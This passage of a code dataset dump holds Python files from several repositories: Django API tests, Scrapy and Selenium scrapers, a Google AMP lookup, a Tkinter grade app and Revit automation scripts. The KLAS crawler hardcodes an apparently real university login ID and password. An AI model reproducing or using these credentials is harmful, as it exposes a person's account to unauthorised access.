flask_router to avoid dupes\n        methods += direct_invocation.parse(nodes, module_name)\n\n        for method in methods:\n            method.drift.source_path = os.path.abspath(source_path)\n            method.drift.children = _get_method_children(method)\n            method.drift.end_line = _get_ending_line(method)\n\n        return methods\n    except IOError as err:\n        # Fail gracefully if a file can't be read\n        # (This shouldn't happen, but if it does\n        #  we don't want to \"break the build\".)\n        sys.stderr.write(\n            f'WARNING: could not read file: {source_path}\\n')\n        sys.stderr.write(\n            f'\\t{str(err)}\\n')\n\n        return []\n    except SyntaxError as err:\n        # Fail gracefully if a file doesn't use py3-compliant syntax.\n        sys.stderr.write(\n            f'WARNING: could not parse file: {source_path}\\n')\n        sys.stderr.write(\n            f'\\t{str(err)}\\n')\n\n        return []\n","repo_name":"GoogleCloudPlatform/repo-automation-playground","sub_path":"xunit-autolabeler-v2/ast_parser/python/source_parser.py","file_name":"source_parser.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"}
{"seq_id":"11643670773","text":"from django.urls import reverse,resolve\nfrom rest_framework.test import APITestCase\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\nfrom applications.vehicles.routers import router\nfrom .test_type_vehicle import TypeVehicleAPIViewTests \nfrom .test_brand_api import BrandAPIViewTests\nfrom applications.vehicles.models import *\nclass VehicleAPIViewTests(APITestCase):\n\n type_vehicle_url = reverse('type_vehicle-list')\n brand_url = reverse('brand-list')\n vehicle_url = reverse('vehicle-list')\n vehicle_urls_detail = reverse('vehicle-detail', args=[1])\n\n\n\n type_vehicle = TypeVehicleAPIViewTests.data_type_vehicle\n brand = BrandAPIViewTests.data_brand\n\n\n\n def setUp(self):\n self.user = User.objects.create_user(username='admin',password='admin@gmail.com')\n self.token = Token.objects.create(user = self.user)\n self.client.credentials(HTTP_AUTHORIZATION='Token '+self.token.key)\n self.response_type_vehicle = self.client.post(self.type_vehicle_url,data=self.type_vehicle, format='json')\n self.response_brand = self.client.post(self.brand_url,data=self.brand, format='json')\n brand_object = Brand.objects.get(id=self.response_brand.data['id']).id\n type_vehicle_object = TypeVehicle.objects.get(id=self.response_type_vehicle.data['id']).id\n\n self.vehicle_data = {\n 'modelo' : 2018,\n 'brand' : self.response_brand.data['id'],\n 'type_vehicle' : self.response_type_vehicle.data['id'],\n 'plate' : 'ddrx2'\n }\n response_vehicle = self.client.post(self.vehicle_url,self.vehicle_data,format='json')\n\n def tearDown(self):\n pass\n\n def test_get_vehicle_authenticated(self):\n response = self.client.get(self.vehicle_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_post_vehicle_authenticated(self):\n response = self.client.post(self.vehicle_url,self.vehicle_data,format='json')\n #import pdb; pdb.set_trace()\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n self.assertEqual(response.data['modelo'], 2018)\n return response\n\n #self.assertEqual(response.data['type_vehicle'],'automovil')\n\n def test_detail_vehicle_authenticated(self):\n response = self.client.get(self.vehicle_urls_detail)\n #import pdb; pdb.set_trace()\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.data['modelo'],2018)\n\n ### NOT AUTHENTICATED\n\n def 
test_get_vehicle_un_authenticated(self):\r\n self.client.force_authenticate(user=None,token=None)\r\n response = self.client.get(self.vehicle_url)\r\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\r\n\r\n def test_post_vehicle_un_authenticated(self):\r\n self.client.force_authenticate(user=None,token=None)\r\n response = self.client.post(self.vehicle_url,data=self.vehicle_data, format='json')\r\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\r\n\r\n\r\n def test_detail_vehicle_un_authenticated(self):\r\n self.client.force_authenticate(user=None,token=None)\r\n response = self.client.get(self.vehicle_urls_detail)\r\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\r\n\r\n\r\n","repo_name":"EdwardPinzon13/test-orders","sub_path":"applications/vehicles/tests/test_vehicle_api.py","file_name":"test_vehicle_api.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"40956103037","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimg = np.loadtxt('edge_detect.txt', delimiter = ',')\nsave = False if input(\"Save figure? \").lower() == 'no' else True\nverbose = False if input(\"Plot figure? \").lower() == 'no' else True\n\n\nfig, ax = plt.subplots(figsize=(15,15))\nax.imshow(img, cmap='gray')\nif save == True:\n plt.savefig('result.png', format = 'png')\nif verbose == True:\n plt.show()\n","repo_name":"burklight/GPU-Accelerated-Edge-Detection","sub_path":"app/saveImage.py","file_name":"saveImage.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"13186982865","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom time import sleep\n\n# Close all popup windows\ndef close_all_popup(driver) :\n popups = driver.find_elements_by_tag_name('iframe')[:-2]\n for popup in popups :\n popup_src = popup.get_attribute(\"src\")\n # everything after '=' is the popup id\n popup_id = popup_src[popup_src.find('=') + 1:]\n driver.switch_to_frame(popup)\n driver.execute_script('fn_close(\"{}\");'.format(popup_id))\n\n\n \n\ndriver = webdriver.Chrome('/Users/justi/chromedriver_win32/chromedriver')\n\ndriver.implicitly_wait(3)\n\ndriver.get('https://klas.khu.ac.kr/index.jsp?sso=ok')\n\n\nmain = driver.find_element_by_name('main')\ndriver.switch_to_frame(main)\n\nclose_all_popup(driver)\n\n# Go back to the main frame\ndriver.switch_to_default_content()\ndriver.switch_to_frame(main)\n\n# Log in\ndriver.find_element_by_name('USER_ID').send_keys(\"justdo\")\ndriver.find_element_by_name('PASSWORD').send_keys(\"2016104163a\")\ndriver.execute_script('login()')\n\nmain = driver.find_element_by_name('main')\n\ndriver.switch_to_frame(main)\n\nhtml = driver.page_source\n\nbs = BeautifulSoup(html, 'lxml')\n\nalarm = bs.find('div', class_='log_ex_sec_cont')\n\nif alarm.find('dl').get_text() == '' :\n print(\"There are no notifications.\")\nelse :\n for warning in alarm.find_all('dl') :\n warning.find('dt').get_text() # course name\n warning.find('dd').get_text()[:-12] # assignment name\n warning.find('dd').get_text()[-12:] # due date\n\n\n","repo_name":"euidong/khu_alarm","sub_path":"crawler/klas_crawler.py","file_name":"klas_crawler.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"14685302191","text":"import numpy as np\r\nimport cv2\r\n\r\nhighThresh\t= 0.4\r\nlowThresh\t\t= 0.1\r\nimgFileList\t= ('./ip.jpeg', './mypic.jpg')\r\n\r\ndef 
sobel(img):\r\n\t\r\n\topImgx\t\t= cv2.Sobel(img,cv2.CV_8U,0,1,ksize=3)\r\n\topImgy\t\t= cv2.Sobel(img,cv2.CV_8U,1,0,ksize=3)\t\r\n\t\r\n\treturn cv2.bitwise_or(opImgx,opImgy)\t\r\n\r\ndef sketch(frame):\t\r\n\t\r\n\tframe\t\t= cv2.GaussianBlur(frame,(3,3),0)\r\n\tinvImg\t= 255-frame\r\n\tedgImg0\t\t= sobel(frame)\r\n\tedgImg1\t\t= sobel(invImg)\r\n\tedgImg\t\t= cv2.addWeighted(edgImg0,1,edgImg1,1,0)\t\r\n\topImg\t\t= 255-edgImg\r\n\treturn opImg\r\n\t\r\nif __name__ == '__main__':\r\n\tfor imgfile in imgFileList:\r\n\t\tprint (imgfile)\r\n\t\timg\t\t= cv2.imread (imgfile,0)\r\n\t\topImg\t= sketch(img)\t\r\n\t\tcv2.imshow (imgfile,opImg)\r\n\t\r\n\tcv2.waitKey()\r\n\tcv2.destroyAllWindows()","repo_name":"Yamini-G/projects","sub_path":"Cartoonifier/python codes/sketch.py","file_name":"sketch.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"5447995526","text":"def checking(number):\n    try:\n        number = int(number)\n        if number <=0 or number >=120:\n            print('You typed a wrong age') # or raise ValueError('You typed a wrong age')\n            return False\n        else:\n            return True\n    except ValueError:\n        print('You did not enter a valid age')\n        return False\n\ndef is_odd(age):\n    if age %2 == 1:\n        return True\n    return False\nwhile True:\n    input_ = input(\"Enter your age: \")\n    if checking(input_):\n        print(f'Your age is odd: {is_odd(int(input_))}')\n        break\n\n\n","repo_name":"kolyasalubov/UA-12-10-23.PythonFundamentals","sub_path":"MorozovVladyslav/HW11/first_task.py","file_name":"first_task.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
{"seq_id":"36517716018","text":"import logging\nimport os\nfrom enum import Enum\nfrom typing import Dict, Collection, Optional\n\nfrom aiohttp import ClientSession\n\n\nlogger = logging.getLogger(__name__)\n\n\nBATCH_MAX_URLS = 50\nAPI_URL = 'https://acceleratedmobilepageurl.googleapis.com/v1/ampUrls:batchGet'\n\n\nclass LookupStrategy(Enum):\n    \"\"\"\n    AMP lookup strategies:\n\n    FETCH_LIVE_DOC:\n        strategy involves live document fetch of URLs not found in the index.\n        Any request URL not found in the index is crawled in realtime to validate if there\n        is a corresponding AMP URL. This strategy has higher coverage but with extra latency\n        introduced by realtime crawling. This is the default strategy. Applications using this\n        strategy should set higher HTTP timeouts of the API calls.\n\n    IN_INDEX_DOC:\n        strategy skips fetching live documents of URL(s) not found in index. For\n        applications which need low latency use of IN_INDEX_DOC strategy is recommended.\n\n    \"\"\"\n    FETCH_LIVE_DOC = 'FETCH_LIVE_DOC'\n    IN_INDEX_DOC = 'IN_INDEX_DOC'\n\n\nasync def create_amp_lookup(urls: Collection[str],\n                            lookup_strategy: LookupStrategy = LookupStrategy.FETCH_LIVE_DOC,\n                            http_client: Optional[ClientSession] = None) -> Dict:\n    \"\"\"\n    Creates an AMP lookup dict based on provided articles.\n    Does a Google API call and tries to match existing article URLs\n    to AMP versions. 
Returns a dict where key is an original url\n    and value is an AMP url\n    \"\"\"\n    logger.info('Creating AMP lookup')\n    if not urls:\n        return {}\n\n    urls = list(urls)  # convert to list so we'll be able to do slicing\n    http_client = http_client or ClientSession()\n    lookup = {}\n\n    # since max number of URLs we can pass is 50 - we divide the urls\n    # list into a few different lists to be able to process all of them\n    for x in range((len(urls) - 1) // BATCH_MAX_URLS + 1):  # number of BATCH_MAX_URLS-sized batches\n        start_idx = x * BATCH_MAX_URLS\n        end_idx = x * BATCH_MAX_URLS + BATCH_MAX_URLS\n        scope = urls[start_idx:end_idx]\n\n        if not scope:\n            continue\n\n        async with http_client.post(\n            API_URL,\n            json={'urls': scope, 'lookupStrategy': lookup_strategy.value},\n            params={'key': os.environ['GOOGLE_API_KEY']}\n        ) as response:\n\n            response.raise_for_status()\n            json_response = await response.json()\n            amp_urls = json_response.get('ampUrls')\n            if not amp_urls:\n                continue  # it's possible that no AMP URL's returned\n            lookup.update({x['originalUrl']: x['ampUrl'] for x in amp_urls})\n\n    logger.info(f'AMP lookup created. Found {len(lookup)} out of {len(urls)} URLs')\n    return lookup\n","repo_name":"Aristekrat/unified_api","sub_path":"unifiedpost/parsers/amp/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"11601696101","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/2/23 9:53\n# @Author : lightsmile\n# @Software: PyCharm\n\nfrom lightspider import Spider, light\nfrom lxml import etree\n\n\n@light\ndef parser(response):\n    html = etree.HTML(response.text)\n    title = html.xpath('string(.//div[@class=\"list-group-item active-cat\"])').strip()\n    items = html.xpath('.//div[@id=\"ipt-kb-affix-active-post\"]/a')\n    items = [(item.xpath('string(.)').strip(), item.xpath('string(./@href)'))for item in items]\n    return {\n        'category': title,\n        'peoples': items\n    }, None\n\n\nbase_url = 'http://www.w3guo.com/wiki/hero/{}'\ntasks = ['other', 'wu', 'wei', 'shu', 'jin']\n\nsave_format = 'json'\nsave_path = r'D:\\Data\\KG\\three_kingdoms_people'\n\nspider = Spider(base_url=base_url, save_format=save_format, save_path=save_path, interval=2)\n\nif __name__ == '__main__':\n    spider.run(tasks, parser)\n","repo_name":"smilelight/lightSpider","sub_path":"examples/w3guo_people.py","file_name":"w3guo_people.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"}
{"seq_id":"9911450658","text":"import scrapy\nfrom datetime import datetime\n\nfrom theoccasionoctopusbotsimport.base_spider import BaseSpider\n\n\nclass CoopsUK(BaseSpider):\n    name = 'coopsuk'\n    download_delay = 30\n    start_urls = ['https://www.uk.coop/all-events']\n\n    def start_requests(self):\n        yield scrapy.Request(\n            url='https://www.uk.coop/all-events',\n            callback=self.parse_list\n        )\n\n    def parse_list(self, response):\n        for link in response.xpath(\"//article[contains(@class, 'node')]\"):\n            url = 'https://www.uk.coop' + link.xpath('a').xpath('@href').extract()[0]\n            yield scrapy.Request(\n                url=url,\n                callback=self.parse\n            )\n        next_page = response.xpath(\"//li[contains(@class, 'pager-next')]\").xpath('a').xpath('@href').extract()\n        if next_page:\n            yield scrapy.Request(\n                url='https://www.uk.coop' + next_page[0],\n                callback=self.parse_list\n            )\n\n    def parse(self, response):\n\n        if response.css(\"div.event-meta\").css(\"span.date-display-start\"):\n\n            start_string = 
response.css(\"div.event-meta\").css(\"span.date-display-start\").xpath('@content').extract()[0]\n start = datetime.strptime(start_string, '%Y-%m-%dT%H:%M:%S%z')\n\n end_string = response.css(\"div.event-meta\").css(\"span.date-display-end\").xpath('@content').extract()[0]\n end = datetime.strptime(end_string, '%Y-%m-%dT%H:%M:%S%z')\n\n else:\n\n start_string = response.css(\"div.event-meta\").css(\"span.date-display-single\").xpath('@content').extract()[0]\n start = datetime.strptime(start_string, '%Y-%m-%dT%H:%M:%S%z')\n end = datetime.strptime(start_string, '%Y-%m-%dT%H:%M:%S%z')\n\n out = {\n 'event': {\n 'find_by_url': response.request.url,\n 'data': {\n 'title': response.xpath(\"//h1\").xpath('string(.)').extract()[0].strip(),\n 'url': response.request.url,\n 'description': response.xpath(\"//div[contains(@class, 'body')]\").xpath('string(.)').extract()[0].strip(),\n 'start_year_timezone': start.year,\n 'start_month_timezone': start.month,\n 'start_day_timezone': start.day,\n 'start_hour_timezone': start.hour,\n 'start_minute_timezone': start.minute,\n 'end_year_timezone': end.year,\n 'end_month_timezone': end.month,\n 'end_day_timezone': end.day,\n 'end_hour_timezone': end.hour,\n 'end_minute_timezone': end.minute,\n 'deleted': False,\n 'cancelled': False,\n },\n 'add_tags': []\n }\n }\n for tag_id, tag in self.tags.items():\n if tag['title'] in out['event']['data']['title']:\n out['event']['add_tags'].append(tag_id)\n\n yield out\n","repo_name":"theoccasionoctopus/theoccasionoctopus-bots-import","sub_path":"theoccasionoctopusbotsimport/spiders/coopsuk.py","file_name":"coopsuk.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35193789562","text":"# 古典问题:有一对兔子,从出生后第3个月起每个月都生一对兔子,小兔子长到第三个月后每个月又生一对兔子,假如兔子都不死,问每个月的兔子总数为多少?\n\"\"\"\n2,2,4,6,10,16,26...\n\"\"\"\n\n\n\ndef rabbits_sum(time):\n r_1 = 2\n r_2 = 2\n if time <= 2:\n return 2\n else:\n for i in range(time-3):\n r_1 += r_2\n r_2 += r_1\n if time % 2 == 0:\n return r_2\n else:\n return r_1\n\n\nif __name__ == '__main__':\n time = int(input(\"输入第几个月:\"))\n print(rabbits_sum(time))\n","repo_name":"MarshallMeng2079/100pythons","sub_path":"Python刷题/23-11.py","file_name":"23-11.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38779024256","text":"def bfs():\n que = []\n dr = (-1, 1, 0, 0)\n dc = (0, 0, -1, 1)\n # 1] 시작점을 큐에 저장 (방문표시)\n que.append((sr, sc, 0)) # 행, 열, 시간을 큐에 저장\n arr[sr][sc] = 1 # 맵에 방문표시\n while que:\n # 2] 큐에서 데이터 읽기\n r, c, time = que.pop(0)\n if r == er and c == ec: return time # 도착하면 리턴\n # 3] 델타검색하면서 연결점(길)을 찾아 큐에 저장\n for i in range(4):\n nr = r + dr[i]\n nc = c + dc[i]\n # 3-1] 맵의 범위 체크\n if nr < 0 or nr >= R or nc < 0 or nc >= C: continue\n # 3-2] 연결점을 찾아 큐에 저장(방문표시)\n if arr[nr][nc] != 0: continue # 길이 아니면 스킵\n arr[nr][nc] = 1\n que.append((nr, nc, time + 1))\n # 4] 큐가 빈 상태(예외상황)\n return -1\n\nC, R = map(int, input().split())\nsc, sr, ec, er = map(int, input().split())\nsc -= 1\nsr -= 1\nec -= 1\ner -= 1\narr = [list(map(int, input())) for i in range(R)]\nprint(bfs())\n\n#2번째 버전(혜리언니)\n\n# C, R = map(int, input().split())\n# c1, r1, c2, r2 = map(lambda x:int(x)-1, input().split())\n# arr = [list(map(int,input())) for _ in range(R)]\n# Q = [(r1, c1)]\n# dr = (1, -1, 0, 0)\n# dc = (0, 0, -1, 1)\n# while Q:\n# r, c = Q.pop(0)\n# for i in range(4):\n# newr, newc = r+dr[i], c+dc[i]\n# if 0<=newr<R and 
0<=newc<C and not arr[newr][newc]:\n#             Q.append((newr,newc))\n#             arr[newr][newc] = arr[r][c] + 1\n#     if arr[r2][c2]: break\n# print(arr[r2][c2])","repo_name":"woonji913/til","sub_path":"코테대비/20190327/미로탈출로봇.py","file_name":"미로탈출로봇.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"20717428053","text":"import tkinter as tk \nimport sqlite3\nfrom tkinter import ttk\nfrom tkinter import messagebox\n\nconn = sqlite3.connect('data_siswa1.db')\ncursor = conn.cursor()\n\n# Create the table if it does not exist yet\ncursor.execute('''\n    CREATE TABLE IF NOT EXISTS nilai_siswa (\n        id INTEGER PRIMARY KEY AUTOINCREMENT,\n        nama_siswa TEXT,\n        biologi INTEGER,\n        fisika INTEGER,\n        inggris INTEGER,\n        prediksi_fakultas TEXT\n    )\n''')\nconn.commit()\n\ndef submit_nilai():\n    nama_siswa = Nama.get()\n    nilai_biologi = int(Bio.get())\n    nilai_fisika = int(Fis.get())\n    nilai_inggris = int(Bing.get())\n\n    # Determine the predicted faculty\n    prediksi = \"\"\n    if nilai_biologi > nilai_fisika and nilai_biologi > nilai_inggris:\n        prediksi = \"Kedokteran\"\n    elif nilai_fisika > nilai_biologi and nilai_fisika > nilai_inggris:\n        prediksi = \"Teknik\"\n    elif nilai_inggris > nilai_biologi and nilai_inggris > nilai_fisika:\n        prediksi = \"Bahasa\"\n    \n    # Insert the data into SQLite\n    cursor.execute('''\n        INSERT INTO nilai_siswa (nama_siswa, biologi, fisika, inggris, prediksi_fakultas)\n        VALUES (?, ?, ?, ?, ?)\n    ''', (nama_siswa, nilai_biologi, nilai_fisika, nilai_inggris, prediksi))\n    conn.commit()\n    # Show the prediction to the user\n    messagebox.showinfo(\"Prediksi Fakultas\", \"Kamu masuk fakultas \" + prediksi)\n\nuiApp = tk.Tk()\nuiApp.configure(background='black') # set the background color\nuiApp.geometry(\"800x800\") # window size\nuiApp.resizable(False,False) # disable resizing\nuiApp.title(\"Prediksi Fakultas\") # set the title\n\ninputFrame = tk.Frame(uiApp) #Make canvas\ninputFrame.pack(padx=10, pady=10, fill=\"x\", expand=True) #Make canvas\n\ninputLabel = ttk.Label(inputFrame, text=\"Prediksi Fakultas\") #Make Label\ninputLabel.pack(padx=10, pady=10, fill=\"x\",expand=True) #Make Label\n\n#1\nNama = ttk.Label(inputFrame, text=\"Nama : \")\nNama.pack(padx=10, pady=5, fill=\"x\", expand=True)\nNama = ttk.Entry(inputFrame)\nNama.pack(padx=10, pady=5, fill=\"x\", expand=True)\n\n#2\nBio = ttk.Label(inputFrame, text=\"Biologi : \")\nBio.pack(padx=10, pady=5, fill=\"x\", expand=True)\nBio = ttk.Entry(inputFrame)\nBio.pack(padx=10, pady=5, fill=\"x\", expand=True)\n\n#3\nFis = ttk.Label(inputFrame, text=\"Fisika : \")\nFis.pack(padx=10, pady=5, fill=\"x\", expand=True)\nFis = ttk.Entry(inputFrame)\nFis.pack(padx=10, pady=5, fill=\"x\", expand=True)\n\n#4\nBing = ttk.Label(inputFrame, text=\"Binggris : \")\nBing.pack(padx=10, pady=5, fill=\"x\", expand=True)\nBing = ttk.Entry(inputFrame)\nBing.pack(padx=10, pady=5, fill=\"x\", expand=True)\n\nbuttonSubmit = ttk.Button (inputFrame, text=\"Prediksi Fakultas \", command= submit_nilai)\nbuttonSubmit.pack(padx=10, pady=10, fill=\"x\", expand=True)\n\nuiApp.mainloop() \n\nconn.close()","repo_name":"Kurwhy/pythonDB_040","sub_path":"Praktikum1.py","file_name":"Praktikum1.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"4072197634","text":"# 3rd party\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom 
selenium.webdriver.chrome.options import Options\nfrom bs4 import BeautifulSoup\n\n# normal library\nimport time\nimport datetime\nimport sqlite3\nimport tkinter\nfrom tkinter import messagebox\n\n# my package\nfrom my_package.web.Web import Web\nfrom my_package.web.WebRegister import register_web\nfrom my_package.utils import url, scrape\n\n# Check whether a DB entry exists for the site to scrape; create one if missing, otherwise return its data\ndef get_web_data():\n    conn = sqlite3.connect('my.db')\n    c = conn.cursor()\n    data = None\n    try:\n        c.execute(\"SELECT * FROM webs WHERE name = 'manaba'\")\n        data = c.fetchone()\n        if data is None:\n            register_web(default_name='manaba', default_url='https://ct.ritsumei.ac.jp/ct/home')\n            c.execute(\"SELECT * FROM webs WHERE name = 'manaba'\")\n            data = c.fetchone()\n    except:\n        register_web(default_name='manaba', default_url='https://ct.ritsumei.ac.jp/ct/home')\n        c.execute(\"SELECT * FROM webs WHERE name = 'manaba'\")\n        data = c.fetchone()\n    if data is None:\n        c.execute(\"DELETE FROM webs WHERE name='manaba'\")\n        conn.commit()\n        conn.close()\n        return None\n    web = Web(data[0], data[1], data[2], data[3], data[4])\n    conn.commit()\n    conn.close()\n    return web\n\n# Fetch report information from manaba\ndef manaba_scrape()-> list:\n    # manaba login credentials\n    web = get_web_data()\n    if web is None:\n        return None\n\n    # Run in headless mode\n    options = Options()\n    options.add_argument('--headless')\n\n    browser = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)\n\n    browser.implicitly_wait(10)\n\n    if url.checkURL(web.get_pageData('url')):\n        browser.get(web.get_pageData('url'))\n        time.sleep(1)\n    else:\n        error_message('指定されたページが存在しません。')\n        return None\n\n    # Log in\n    form_dict = {'/html/body/div/div[2]/div[1]/form/p[1]/input':web.get_pageData('id'),\n                 '/html/body/div/div[2]/div[1]/form/p[2]/input':web.get_pageData('password')}\n    scrape.input_element(browser, form_dict)\n    time.sleep(1)\n    scrape.button_click(browser, '/html/body/div/div[2]/div[1]/form/p[3]/input')\n    time.sleep(3)\n\n    # Navigate to the course list\n    try:\n        scrape.button_click(browser, '/html/body/div[2]/div[1]/div[5]/div[2]/a/img')\n        time.sleep(1)\n    except:\n        error_message('manabaのログインに失敗しました。')\n        browser.quit()\n        return None\n\n    # Switch the course list display to the weekday layout\n    scrape.button_click(browser, '/html/body/div[2]/div[2]/div/div[1]/div[2]/ul/li[3]/a')\n    time.sleep(1)\n\n    # Get course names\n    html = browser.page_source.encode('utf-8')\n    soup = BeautifulSoup(html, 'html.parser')\n    my_courses = soup.find_all('td', attrs={'class':'course-cell'})\n    my_class = []\n    for course in my_courses:\n        # course name\n        course_name = course.find('a').text.split(' § ')\n        name = []\n        for cls_name in course_name:\n            name.append(cls_name.split(':')[1])\n        course_name = ' § '.join(name)\n        # assignments\n        homework = course.find('img', attrs={'src':'/icon-coursedeadline-on.png'})\n        if homework is not None:\n            my_class.append(f'{course_name}')\n        else:\n            my_class.append(None)\n        time.sleep(1)\n    \n    # assignments\n    report_and_difftime = []\n    for inv,class_name in enumerate(my_class):\n        # Check whether there are unsubmitted assignments\n        classworks = browser.find_elements_by_css_selector(\"div.courselistweekly-nonborder a\")\n        class_elem = classworks[inv*2]\n        if class_name is not None:\n            # Open each course page\n            browser.execute_script(\"arguments[0].click();\", class_elem)\n            time.sleep(1)\n            # report section\n            nonsubmit_report = browser.find_element_by_css_selector(\"div.course-menu-report span.my-unreadcount\")\n            time.sleep(1)\n            if nonsubmit_report is not None:\n                course_report = browser.find_element_by_css_selector(\"a#coursereport\")\n                browser.execute_script(\"arguments[0].click();\", course_report)\n                time.sleep(1)\n                report_icon = 
browser.find_elements_by_css_selector(\"img[src='/icon-deadline-on.png']\")\n reports = browser.find_elements_by_css_selector(\"h3.report-title a\")\n deadlines = browser.find_elements_by_css_selector(\"td.border.center\")\n time.sleep(1)\n for i in range(len(report_icon)):\n deadline = deadlines[i+3].text\n dt = datetime.datetime.strptime(deadline, \"%Y-%m-%d %H:%M\")\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n now = datetime.datetime.strptime(now, \"%Y-%m-%d %H:%M\")\n diff = dt - now\n report_info = (class_name,reports[i].text,diff)\n report_and_difftime.append(report_info)\n time.sleep(1)\n scrape.button_click(browser, '/html/body/div[2]/div[1]/div[5]/div[2]/a/img', 10)\n time.sleep(3)\n return report_and_difftime\n\ndef error_message(text:str):\n conn = sqlite3.connect('my.db')\n c = conn.cursor()\n c.execute(\"DELETE FROM webs WHERE name='manaba'\")\n conn.commit()\n conn.close()\n root = tkinter.Tk()\n root.withdraw()\n messagebox.showerror('エラー',text)\n time.sleep(5)\n root.destroy()\n\nif __name__=='__main__':\n a = manaba_scrape()\n print(a[0])","repo_name":"kensabrou/manaba-scrape","sub_path":"manaba.py","file_name":"manaba.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"982609065","text":"# coding: utf8\nfrom System.Collections.Generic import List\n\nfrom Autodesk.Revit.DB import Document, FilterStringRule, ParameterValueProvider, FilteredElementCollector, \\\n BuiltInParameter, FilterStringBeginsWith, FilterRule, ParameterFilterElement, BuiltInCategory, Category, \\\n ElementId, FilterInverseRule, View3D, ViewDuplicateOption, FilterStringContains\nfrom Autodesk.Revit.DB.Mechanical import Duct\nfrom Autodesk.Revit.DB.Plumbing import Pipe\n\nimport rpw\n\ndoc = __revit__.ActiveUIDocument.Document # type: Document\n\n\n# valueProvider\ndef parameter_value_provider(base_class, built_in_parameter):\n # type: (type, str) -> ParameterValueProvider\n element = FilteredElementCollector(doc).OfClass(base_class).FirstElement()\n system_type_parameter_id = element.get_Parameter(built_in_parameter).Id\n return ParameterValueProvider(system_type_parameter_id)\n\n\n# Base view\ndef get_base_view(name):\n # type: (str) -> View3D\n for view in FilteredElementCollector(doc).OfClass(View3D):\n if view.Name == name:\n return view\n\n\ndef create_views(value_provider, built_in_category_list, prefix, num_range, num_format):\n # type: (ParameterValueProvider, iter, str, iter, str) -> None\n # evaluator\n # rule_evaluator = FilterStringBeginsWith()\n rule_evaluator = FilterStringContains()\n\n # caseSensitive\n case_sensitive = True\n\n # categories\n cat_ids = List[ElementId]()\n for cat in built_in_category_list:\n cat_id = Category.GetCategory(doc, eval(\"BuiltInCategory.{}\".format(cat))).Id\n cat_ids.Add(cat_id)\n\n base_view = get_base_view(\"3DControlBaseView\")\n\n with rpw.db.Transaction(\"Create 3D Control Views\"):\n for n in num_range:\n # ruleString\n filter_string = \"{prefix}{number:{num_format}}\".format(prefix=prefix, number=n, num_format=num_format)\n\n # rules\n filter_string_rule = FilterStringRule(value_provider, rule_evaluator, filter_string, case_sensitive)\n inverse_filter_rule = FilterInverseRule(filter_string_rule)\n rules = List[FilterRule]()\n rules.Add(inverse_filter_rule)\n\n # Create Filter\n filter_element = ParameterFilterElement.Create(doc, \"SAUF_{}\".format(filter_string), cat_ids, rules)\n\n # Add filter to view\n view = 
doc.GetElement(base_view.Duplicate(ViewDuplicateOption.Duplicate))\n view.Name = filter_string\n view.AddFilter(filter_element.Id)\n view.SetFilterVisibility(filter_element.Id, False)\n\n\ndef create_piping_views(prefix, num_range):\n # type: (str, iter) -> None\n value_provider = parameter_value_provider(Pipe, BuiltInParameter.RBS_PIPING_SYSTEM_TYPE_PARAM)\n bic_list = \"OST_PipeCurves\", \"OST_PipeFitting\", \"OST_PipeAccessory\", \"OST_PipeInsulations\"\n num_format = \"\"\n create_views(value_provider, bic_list, prefix, num_range, num_format)\n\n\ndef create_ventilation_views(prefix, num_range):\n # type: (str, iter) -> None\n value_provider = parameter_value_provider(Duct, BuiltInParameter.RBS_DUCT_SYSTEM_TYPE_PARAM)\n bic_list = \"OST_DuctCurves\", \"OST_DuctFitting\", \"OST_DuctAccessory\", \"OST_DuctTerminal\", \"OST_DuctInsulations\"\n num_format = \":02d\"\n create_views(value_provider, bic_list, prefix, num_range, num_format)\n\n\n# create_piping_views(\"HYD_SPE_247.\", range(1, 4))\n# create_ventilation_views(\"VEN_244.\", range(1, 67))\ncreate_piping_views(\"353.\", range(1, 